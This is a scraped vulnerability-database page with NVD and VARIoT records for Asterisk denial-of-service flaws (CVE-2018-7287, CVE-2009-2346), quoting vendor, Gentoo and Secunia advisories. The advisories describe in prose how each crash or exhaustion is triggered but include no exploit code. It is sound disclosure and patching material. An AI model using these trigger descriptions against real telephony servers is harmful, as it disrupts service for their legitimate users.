  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2018-02-22 00:29

Modified

2024-11-21 04:11

Severity ?

5.9 (Medium) - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in res_http_websocket.c in Asterisk 15.x through 15.2.1. If the HTTP server is enabled (default is disabled), WebSocket payloads of size 0 are mishandled (with a busy loop).

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2018-006.html	Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/103120	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1040419	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27658	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2018-006.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/103120	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1040419	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27658	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	15.0.0
digium	asterisk	15.0.0
digium	asterisk	15.1.0
digium	asterisk	15.1.0
digium	asterisk	15.1.0
digium	asterisk	15.1.1
digium	asterisk	15.1.2
digium	asterisk	15.1.3
digium	asterisk	15.1.4
digium	asterisk	15.1.5
digium	asterisk	15.2.0
digium	asterisk	15.2.0
digium	asterisk	15.2.0
digium	asterisk	15.2.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "9B067A37-7101-48F8-B42A-50A0F59154F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0D20EE5-E2C7-4CD3-9932-33A0C27465C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C42CFBDA-8B84-4A8F-8C1E-207C48138DFC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8B0C2D39-0D85-4655-968F-9B6F48C4DE18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "25307605-D767-4253-BEE7-928B89DA260A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "E057E8B7-B1E9-4A62-9C7D-14F36435F16D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "17F0D6D8-AE61-4A0C-B8D6-D91DECB407D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "DA48CBAB-AD3D-4D2A-9932-D21DB10F0884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "A069FD52-C61C-49A4-A863-0FDB21B031B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "491EE070-6913-4AB4-BDB1-CFDCAEFEEFD0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "82F3B56D-E148-4E63-BF7E-F9E8967A24E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "72541FC4-4CC7-435F-B51D-4754E873EBDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68A2AA7A-C598-4F0A-BF83-C804566C5B68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:15.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "43A3B57E-1E68-48CF-902E-4C90FC738B5B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in res_http_websocket.c in Asterisk 15.x through 15.2.1. If the HTTP server is enabled (default is disabled), WebSocket payloads of size 0 are mishandled (with a busy loop)."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema en res_http_websocket.c en Asterisk hasta la versi\u00f3n 15.2.1. Si el servidor HTTP est\u00e1 habilitado (est\u00e1 deshabilitado por defecto), las cargas \u00fatiles de WebSocket de tama\u00f1o 0 se gestionan de forma incorrecta (con un bucle ocupado)."
    }
  ],
  "id": "CVE-2018-7287",
  "lastModified": "2024-11-21T04:11:56.747",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-02-22T00:29:01.173",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2018-006.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103120"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040419"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27658"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2018-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/103120"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040419"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27658"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-754"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

var-200909-0357

Vulnerability from variot

The IAX2 protocol implementation in Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.2, 1.6.0.x before 1.6.0.15, and 1.6.1.x before 1.6.1.6; Business Edition B.x.x before B.2.5.10, C.2.x before C.2.4.3, and C.3.x before C.3.1.1; and s800i 1.3.x before 1.3.0.3 allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many IAX2 message exchanges, a related issue to CVE-2008-3263. The problem is CVE-2008-3263 Related toBy a third party IAX2 Service operation disruption by starting message exchange ( Call number exhaustion ) There is a possibility of being put into a state. Asterisk is prone to a remote denial-of-service vulnerability because it fails to properly handle an excessive amount of call numbers. Successful exploits can cause the application to stop accepting connections, resulting in denial-of-service conditions for legitimate users.

The vulnerabilities are caused due to NULL-pointer dereference errors in the "sip_uri_params_cmp()" and "sip_uri_headers_cmp()" functions. This can be exploited to crash the application via a SIP message lacking certain headers.

Successful exploitation requires that the SIP channel driver is configured with the "pedantic" option enabled.

PROVIDED AND/OR DISCOVERED BY: The vendor credits bugs.digium.com user klaus3000. Asterisk Project Security Advisory - AST-2009-006

+------------------------------------------------------------------------+ | Product | Asterisk | |--------------------+---------------------------------------------------| | Summary | IAX2 Call Number Resource Exhaustion | |--------------------+---------------------------------------------------| | Nature of Advisory | Denial of Service | |--------------------+---------------------------------------------------| | Susceptibility | Remote unauthenticated sessions | |--------------------+---------------------------------------------------| | Severity | Major | |--------------------+---------------------------------------------------| | Exploits Known | Yes - Published by Blake Cornell < blake AT | | | remoteorigin DOT com > on voip0day.com | |--------------------+---------------------------------------------------| | Reported On | June 22, 2008 | |--------------------+---------------------------------------------------| | Reported By | Noam Rathaus < noamr AT beyondsecurity DOT com >, | | | with his SSD program, also by Blake Cornell | |--------------------+---------------------------------------------------| | Posted On | September 3, 2009 | |--------------------+---------------------------------------------------| | Last Updated On | September 3, 2009 | |--------------------+---------------------------------------------------| | Advisory Contact | Russell Bryant < russell AT digium DOT com > | |--------------------+---------------------------------------------------| | CVE Name | CVE-2009-2346 | +------------------------------------------------------------------------+

+------------------------------------------------------------------------+ | Description | The IAX2 protocol uses a call number to associate | | | messages with the call that they belong to. However, the | | | protocol defines the call number field in messages as a | | | fixed size 15 bit field. So, if all call numbers are in | | | use, no additional sessions can be handled. | | | | | | A call number gets created at the start of an IAX2 | | | message exchange. So, an attacker can send a large | | | number of messages and consume the call number space. | | | The attack is also possible using spoofed source IP | | | addresses as no handshake is required before a call | | | number is assigned. | +------------------------------------------------------------------------+

+------------------------------------------------------------------------+ | Resolution | Upgrade to a version of Asterisk listed in this document | | | as containing the IAX2 protocol security enhancements. In | | | addition to upgrading, administrators should consult the | | | users guide section of the IAX2 Security document | | | (IAX2-security.pdf), as well as the sample configuration | | | file for chan_iax2 that have been distributed with those | | | releases for assistance with new options that have been | | | provided. | +------------------------------------------------------------------------+

+------------------------------------------------------------------------+ | Discussion | A lot of time was spent trying to come up with a way to | | | resolve this issue in a way that was completely backwards | | | compatible. However, the final resolution ended up | | | requiring a modification to the IAX2 protocol. This | | | modification is referred to as call token validation. | | | Call token validation is used as a handshake before call | | | numbers are assigned to IAX2 connections. | | | | | | Call token validation by itself does not resolve the | | | issue. However, it does allow an IAX2 server to validate | | | that the source of the messages has not been spoofed. In | | | addition to call token validation, Asterisk now also has | | | the ability to limit the amount of call numbers assigned | | | to a given remote IP address. | | | | | | The combination of call token validation and call number | | | allocation limits is used to mitigate this denial of | | | service issue. | | | | | | An alternative approach to securing IAX2 would be to use | | | a security layer on top of IAX2, such as DTLS [RFC4347] | | | or IPsec [RFC4301]. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-20

                                        http://security.gentoo.org/

Severity: Normal Title: Asterisk: Multiple vulnerabilities Date: June 04, 2010 Bugs: #281107, #283624, #284892, #295270 ID: 201006-20

Synopsis

Multiple vulnerabilities in Asterisk might allow remote attackers to cause a Denial of Service condition, or conduct other attacks.

Affected packages

-------------------------------------------------------------------
 Package            /  Vulnerable  /                    Unaffected
-------------------------------------------------------------------

1 net-misc/asterisk < 1.2.37 >= 1.2.37

Description

Multiple vulnerabilities have been reported in Asterisk:

Nick Baggott reported that Asterisk does not properly process overly long ASCII strings in various packets (CVE-2009-2726).
Noam Rathaus and Blake Cornell reported a flaw in the IAX2 protocol implementation (CVE-2009-2346).
amorsen reported an input processing error in the RTP protocol implementation (CVE-2009-4055).
Patrik Karlsson reported an information disclosure flaw related to the REGISTER message (CVE-2009-3727).
A vulnerability was found in the bundled Prototype JavaScript library, related to AJAX calls (CVE-2008-7220).

Impact

A remote attacker could exploit these vulnerabilities by sending a specially crafted package, possibly causing a Denial of Service condition, or resulting in information disclosure.

Workaround

There is no known workaround at this time.

Resolution

All Asterisk users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/asterisk-1.2.37"

NOTE: This is a legacy GLSA. Updates for all affected architectures are available since January 5, 2010. It is likely that your system is already no longer affected by this issue.

References

[ 1 ] CVE-2009-2726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726 [ 2 ] CVE-2009-2346 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346 [ 3 ] CVE-2009-4055 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4055 [ 4 ] CVE-2009-3727 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3727 [ 5 ] CVE-2008-7220 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7220

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201006-20.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5 . ----------------------------------------------------------------------

Do you have VARM strategy implemented?

(Vulnerability Assessment Remediation Management)

If not, then implement it through the most reliable vulnerability intelligence source on the market.

Implement it through Secunia.

For more information visit: http://secunia.com/advisories/business_solutions/

Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com

TITLE: Asterisk IAX2 Call Number Exhaustion Denial of Service

SECUNIA ADVISORY ID: SA36593

VERIFY ADVISORY: http://secunia.com/advisories/36593/

DESCRIPTION: A vulnerability has been reported in Asterisk, which can be exploited by malicious people to cause a DoS (Denial of Service).

S800i (Asterisk Appliance): Update to version 1.3.0.3.

PROVIDED AND/OR DISCOVERED BY: The vendor credits: * Noam Rathaus * Blake Cornell

ORIGINAL ADVISORY: http://downloads.asterisk.org/pub/security/AST-2009-006.html

About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

.

The vulnerabilities are caused due to "sscanf()" being invoked without specifying a maximum width e.g. when processing SIP messages. This can be exploited to exhaust stack memory in the SIP stack network thread via overly long numeric strings in various fields of a message.

NOTE: According to the vendor this is only potentially exploitable in 1.6.1 and above

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200909-0357",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.2.34"
      },
      {
        "model": "opensource",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.4.24.1"
      },
      {
        "model": "opensource",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.4.26"
      },
      {
        "model": "opensource",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.4.24"
      },
      {
        "model": "appliance s800i",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.3.0.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.2.32"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.2.33"
      },
      {
        "model": "appliance s800i",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.2.31"
      },
      {
        "model": "opensource",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "asterisk",
        "version": "1.4.23.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.22"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.9"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.10"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.12"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.23"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.30.4"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "1.6.1.4"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.21.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.6.0.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.12.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.23"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.19.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.9"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.0_beta7"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.2.0"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.14"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.13"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.26.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4beta"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.5.9"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.26.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.17"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.2.1.2.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.5.5"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.16"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.3.1.0"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.8"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.5.4"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.6"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.14"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.5.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "1.6.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.3.6"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.5.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.6.0.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.21"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.6.0"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.10.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.7"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.19"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.16.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.6.0.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.19"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.7.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.2.4.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.17"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.5"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.7"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.21.2"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.3.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.27"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.18"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.13"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.21"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.6.1.0"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.1.3.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.21.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.3.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.16"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.30"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.22.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.8.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.11"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.5.8"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.12"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.18"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.19.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.0_beta8"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.10.4"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.2.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.30.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.9.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.15"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.3.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.7.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.2.3.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.0"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.6.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.1"
      },
      {
